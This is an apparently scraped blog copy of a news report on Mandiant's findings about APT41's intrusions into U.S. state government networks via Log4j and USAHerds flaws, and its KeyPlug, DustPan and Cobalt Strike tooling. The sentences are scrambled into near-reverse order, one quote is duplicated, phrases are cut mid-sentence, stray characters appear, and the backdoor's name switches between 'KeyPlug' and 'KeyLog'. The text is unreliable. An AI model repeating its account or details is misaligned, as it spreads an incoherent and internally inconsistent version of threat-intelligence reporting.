![]() “A preference for utilizing web exploits to target public-facing web applications, along with the ability to quickly shift targets based on available capabilities indicates that APT41 continues to pose a significant threat to public and private organizations alike around the world,” said Geoff Ackerman, principal threat analyst with Mandiant. While five alleged members of the group were charged by the Department of Justice in 2020, Mandiant researchers said that this recent activity reveals that the group has been undeterred by the indictment. Researchers said that they notified Cloudflare of the malicious activity, and the company has since disrupted communications to the malicious infrastructure.ĪPT41 also leveraged several post-exploitation tools that were previously part of their arsenal including an obfuscated binary called BadPotato for local privilege escalation and credential harvesting, as well as leveraging the existing DeadEye malware and LowKey backdoor with added anti-analysis capabilities.ĪPT41 has been responsible for a high volume of attacks worldwide in the more than 10 years that it has been active, with previous campaigns being centered around espionage as well as financial motivations. Researchers also observed APT41 substantially increasing their usage of Cloudflare services for C2 communications and data exfiltration, including the use of Cloudflare Workers to deploy serverless code and proxy C2 traffic to APT41-operated infrastructure. “A preference for utilizing web exploits to target public-facing web applications, along with the ability to quickly shift targets based on available capabilities indicates that APT41 continues to pose a significant threat to public and private organizations alike around the world." “APT41 heavily used the Windows version of the KEYPLUG backdoor at state government victims between June 2021 and December 2021, thus the deployment of a ported version of the backdoor closely following the state government campaign was significant,” said researchers. KeyLog is a modular backdoor that supports multiple network protocols for command and control (C2), including HTTP, TCP, KCP over UDP and WSS. ![]() And after exploiting the Log4j flaw, APT41 deployed a new variant of the KeyPlug backdoor on Linux servers of multiple victims. During the early stages of one state government intrusion, for instance, APT41 leveraged a new malware family that researchers called DustPan, an in-memory dropper that was used to drop a Cobalt Strike beacon backdoor. Researchers also observed new malware variants and techniques used by the group. For instance, after APT41 exploited a SQL injection flaw to compromise a state government network, Mandiant detected and contained the activity however, two weeks later the group re-compromised the networks by exploiting the (at the time, previously-unknown) flaw in the USAHerds application. In several cases, the group also re-compromised state government victims even after their initial attack was contained. 10, for instance, APT41 began to exploit the flaw in order to compromise at least two state governments, as well as their more traditional targets in the insurance and telecommunications industries. ![]() Within hours of the Apache Foundation’s security advisory for the Log4j flaw on Dec. While APT41 has previously performed mass scanning and exploitation of flaws, these campaigns were more targeted and persistent, with the group quickly adapting to publicly-disclosed vulnerabilities to gain initial access into target networks, said researchers. “APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability.” state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques,” said Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman and John Wolfram, researchers with Mandiant, in a Tuesday analysis. Researchers said that the overall goals of APT41’s campaign remain unknown, although they did observe evidence of the group exfiltrating personal identifiable information (PII). In three incidents, the group also exploited a vulnerability (CVE-2021-44207) in a commercial application called USAHerds, an animal health emergency reporting system that is used by 18 states for responding to livestock-related incidents. Researchers with Mandiant found that the group had compromised networks by exploiting vulnerable Internet-facing web applications, including the infamous Log4j flaw (CVE-2021-44228). state government networks between May and February in a “deliberate campaign” that reflects new attack vectors and retooling by the prolific Chinese state-sponsored group. The APT41 group compromised at least six U.S.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |